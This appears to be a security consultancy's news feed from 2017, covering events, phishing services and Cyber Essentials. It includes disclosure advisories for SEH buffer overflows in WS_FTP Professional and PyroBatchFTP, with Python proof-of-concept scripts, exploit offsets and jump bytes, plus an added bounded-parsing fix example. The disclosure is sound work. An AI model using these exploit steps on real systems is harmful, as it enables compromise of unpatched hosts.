Scottish Cyber Awards 2017

The Scottish Cyber Awards are back!

The Scottish Cyber Awards are returning this November and it looks set to be another great night. Last year, the event was a fantastic celebration of the Cyber Security community in Scotland and we hope this year will be even more successful!

 

As an Information Security Consultancy operating in Scotland, the Scottish Cyber Awards are close to our hearts, as we strongly believe that there is a talented InfoSec community here. We were delighted to be part of this event, both by sponsoring an award and through our CEO, David Stubley, acting as a judge for the entries. David said:

It was difficult to pick winners in some categories because the level of competition was so high, but it is fantastic to help give the winners the recognition that they deserve.

 

Last year, we were thrilled to be awarded the ‘Cyber SME Defender of the Year’ award and this year are looking forward to passing the baton on to our successor. As an SME ourselves, we know the important role that Cyber SMEs play, which is why we were delighted to sponsor this award and are looking forward to congratulating this year’s worthy winner.

The Scottish Cyber Awards are being held at the Sheraton Hotel, Edinburgh on the 22nd November 2017.

CVE-2017-16513 – Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)

Advisory Information

Title: CVE-2017-16513 Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)

Date Published: 03/11/2017

Advisory Summary

The application accepts user input to perform a local search function. Inputting an excessively long string of characters causes the program to crash and allows an attacker to gain control of the execution flow of the application. This issue also impacts the “backup location” field.

Vendor

Ipswitch

Affected Software

Product: Ipswitch WS_FTP Professional
Version: 12.6.03

Description of Issue

A local buffer overflow vulnerability was discovered in Ipswitch WS_FTP Professional version 12.6. This vulnerability was found in the “local search” component of the application. Entering a search string longer than 779 characters will cause the program to crash. It is possible to overwrite the structured exception handler (SEH) after an offset of 840 characters and hijack execution flow of the application. This issue also impacts the “backup location” field and was tested on a 32-bit Windows 7 host.

PoC

The following proof of concept Python script will generate a text file with a string to overwrite SEH. Once the file is generated, copy the contents of poc.txt and paste them into the local search field to trigger the crash.



#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)
#Author: Kevin McGuigan
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#nSEH = "\x74\x08\x90\x90"
#SEH = "\x31\x2D\x91\x23"

buffer = "A" * 840
nSEH = "B" * 4
SEH = "C" * 4


f = open ("poc.txt", "w")
f.write(buffer + nSEH + SEH + "D" * 200)
f.close()

This will trigger an SEH overwrite, as demonstrated by the following screenshot:

SEH Overwrite
 

From here, we can replace SEH with POP POP RET instructions, located at:

23912D31

And replace nSEH with the following code to jump to our payload:

"\x74\x08\x90\x90"

Which will land at the payload, represented in the proof of concept as the character ‘D’ (\x44).

SEH Overwrite
 

A short video proof-of-concept can be seen below:

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of Ipswitch WS_FTP Professional can be found on the Ipswitch website.

Timeline

Initial request for security contact via vendor website – 20th September 2017

Second request sent to vendor – 4th October 2017

Response from security contact, advisory sent – 5th October 2017

Video poc requested by vendor – 10th October 2017

Video poc sent – 10th October 2017

Fix verified by both parties – 20th October 2017

Patch Released – 2nd November 2017

Advisory Released – 3rd November 2017

Fraud and Breach Prevention Summit

Fraud & Breach Prevention Summit: London (17th and 18th October)

7 Elements are proud to be a sponsor of this year’s Fraud & Breach Prevention Summit in London.

We believe this summit is important in bringing the topic of security breaches into the public consciousness. As an information security consultancy delivering incident response capability for our clients, we are well placed to see the rising numbers of breaches.

Breaches happen to all types of organisation regardless of size or industry and it is important to know how to deal with them effectively.

Our CEO, David Stubley, will be taking part in the following two panels and presenting on the topic of incident response:

  • ‘We’ve Been Breached: Now What? How to Effectively Work with Law Enforcement’
    15:20 on the 17th of October. The panel will discuss the importance of planning when it comes to incident response and working proactively with law enforcement.
  • ‘Equifax Breach: Long-term Implications. What Does It Mean for Europe?’
    16:05 on the 17th of October. The panel will discuss the long-term implication of the Equifax breach and the lessons that all organisations should learn from it.
  • In ‘Disaster Strikes: Here’s Your Incident Response Playbook’, David will discuss the five core principles all organisations should apply when responding to an incident. The talk will take place at 12:55 on the 18th of October.

Office Move and Expansion

The past few weeks have been a busy period for the team at 7 Elements. Behind the scenes we have recently moved our Scotland office to the Oracle Campus in Linlithgow, and extended our UK wide coverage by establishing a 7E presence within London.

Scotland

Our Scotland based team will still be the primary point of contact for all engagements, and the new office details can be found here.


London

Our expansion into London is in partnership with Scottish Enterprise and the Scottish Government, with 7 Elements using the prestigious Scotland House as our London base. We are working on some exciting events that we will be hosting at Scotland House, so watch this space for future news and invitations.

Further reading from ScotSoft 2017

Following David’s presentation “Breaking Bad – Season Two” at ScotSoft 2017, this post contains the remediation advice and further reading notes on the matters presented.


CVE-2017-15035 PyroBatchFTP Buffer Overflow (SEH Overwrite)

Advisory Information

Title: PyroBatchFTP Buffer Overflow (SEH Overwrite)

Date Published: 04/10/2017

Advisory Summary

It is possible to cause a buffer overflow in PyroBatchFTP when a client connects to an FTP server with an excessively long current directory string.

Vendor

Emtec

Affected Software

Product: PyroBatchFTP
Version: 3.17

Description of Issue

A buffer overflow vulnerability was discovered in the PyroBatchFTP client version 3.17. This vulnerability occurs after successfully connecting to an FTP server with a current directory string of longer than 2265 characters. It is also possible to overwrite the Structured Exception Handler (SEH) and potentially hijack execution flow of the application.
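Overflows of this kind, here and in the WS_FTP advisory above, typically come from copying externally supplied text into a fixed-size buffer without a length check. The following is an added example, not code from PyroBatchFTP, Ipswitch or the original advisories: a bounded parser for a reply of the form used in the PoC below. The function name `parse_cwd_reply` and the 260-byte `DIR_MAX` are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

#define DIR_MAX 260  /* assumed size of the client's fixed directory buffer */

/* Unsafe pattern (shown as a comment only): the quoted path is copied into a
 * fixed stack buffer with no length check, so an overlong string runs past
 * the buffer and over the exception handler record stored above it.
 *     char dir[DIR_MAX];
 *     strcpy(dir, quoted_path);
 */

/* Bounded version. Extracts the quoted path from a reply of the form
 *     NNN "<path>" is current directory
 * Returns 0 on success, -1 if the reply is malformed, -2 if the path does
 * not fit in out. Never writes more than outsz bytes. */
int parse_cwd_reply(const char *reply, char *out, size_t outsz)
{
    const char *start, *end;
    size_t len;

    if (reply == NULL || out == NULL || outsz == 0)
        return -1;
    out[0] = '\0';
    if ((start = strchr(reply, '"')) == NULL)
        return -1;
    start++;
    if ((end = strchr(start, '"')) == NULL)
        return -1;
    len = (size_t)(end - start);
    if (len >= outsz)            /* need room for the terminator */
        return -2;
    memcpy(out, start, len);
    out[len] = '\0';
    return 0;
}

int main(void)
{
    char dir[DIR_MAX], reply[2400];   /* constructed sample input */
    int n = sprintf(reply, "220 \"");
    memset(reply + n, 'A', 2300);     /* longer than the 2265 in the advisory */
    strcpy(reply + n + 2300, "\" is current directory\r\n");
    printf("overlong reply -> %d\n", parse_cwd_reply(reply, dir, sizeof dir));
    printf("normal reply   -> %d\n",
           parse_cwd_reply("220 \"/pub\" is current directory\r\n", dir, sizeof dir));
    return 0;
}
```

The overlong reply is rejected with -2 and the destination buffer is left as an empty string, so the caller can drop the connection or report an error instead of continuing with a truncated path.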

PoC

The following proof of concept Python script will initialise an FTP server on the host system.
Connecting to the FTP server using PyroBatchFTP will trigger the buffer overflow.


#!/usr/bin/python

print "Pyro FTP Buffer Overflow (SEH) Server"

#Author: Kevin McGuigan
#Author Website: https://www.7elements.co.uk 
#Vendor Website: https://www.emtech.com

import socket 
import sys

buffer="A"*2292+ "B"*4+"C"*4+"D"*800 
port = 21

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))
    s.listen(5)
    print("[+] FTP server started on port: "+str(port)+"\r\n")
except socket.error:
    print("[+] Failed to bind the server to port:"+str(port)+"\r\n")
    # Nothing to serve if the listener could not be created
    sys.exit(1)
while True:
    conn, addr = s.accept()
    conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('230 OK\r\n')
    print(conn.recv(1024))
    # Reply carrying the overlong current directory string
    conn.send('220 "'+buffer+'" is current directory\r\n')

SEH Overwrite
 

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of PyroBatchFTP can be found on the EmTec website.

Timeline

Reported – 16th September 2017

Vendor Response – 18th September 2017

Update Requested – 3rd October 2017

Vendor Response and Patch – 4th October 2017

Advisory Published – 4th October 2017

Summer Newsletter 2017

Did you miss our latest newsletter? If so, you can get a copy here and don’t forget to sign up for future copies.

Phishing and Awareness

2017 has seen an increase in the uptake of our tailored phishing services, as organisations look to gain a deeper understanding of the threat posed.

Currently the average exposure (the percentage of employees clicking phishing emails) is 42% with outliers at 83% and in many of our engagements we are able to entice end users to provide domain credentials.

 

This clearly shows a need for training and awareness along with regular testing to measure the effectiveness of any intervening attempts to improve on how staff deal with phishing attempts.

As part of this holistic approach, 7 Elements are proud to announce that we are partnering with Advanced Engagement to deliver customised security awareness training, alongside real world phishing engagements to measure the effectiveness of such campaigns.

Advanced Engagement is a dedicated security awareness training company trusted by financial services organisations and professional bodies with the aim of positively influencing the security culture in your organisation.

If you would like to explore your organisation’s exposure to phishing, then please get in touch with our team to discuss how we can help.

7 Elements shortlisted for award

Government Places Importance on Cyber Essentials

Matt Hancock, the minister for Digital and Culture, made it clear today that the Government wishes Cyber Essentials Accreditation to become a priority for all businesses. This comes after 2016 was plagued consistently with high-profile attacks, ranging from Yahoo to the American Election. In a recent IoD Survey, it was found that whilst 95% of business leaders considered cyber security to be very/quite important to their business, 45% did not have a formal cyber security strategy in place.

Cyber Essentials is already a requirement for many Government suppliers and sub-contractors, such as in the Healthcare and defence industries. However, Matt Hancock stated that the Government will be widening this Cyber Essentials criterion to include more suppliers than ever. Furthermore, a number of the UK’s biggest firms, such as Barclays, BT, Vodafone and Airbus Defence & Security, have agreed to promote Cyber Essentials accreditation to their suppliers.

7 Elements is the leading Scotland-based Cyber Essentials Certification Body. As an independent technical information assurance consultancy, we pride ourselves on being well placed to help your organisation through the process of gaining Cyber Essentials certification.

More information on Cyber Essentials can be found here, or just get in touch with the team.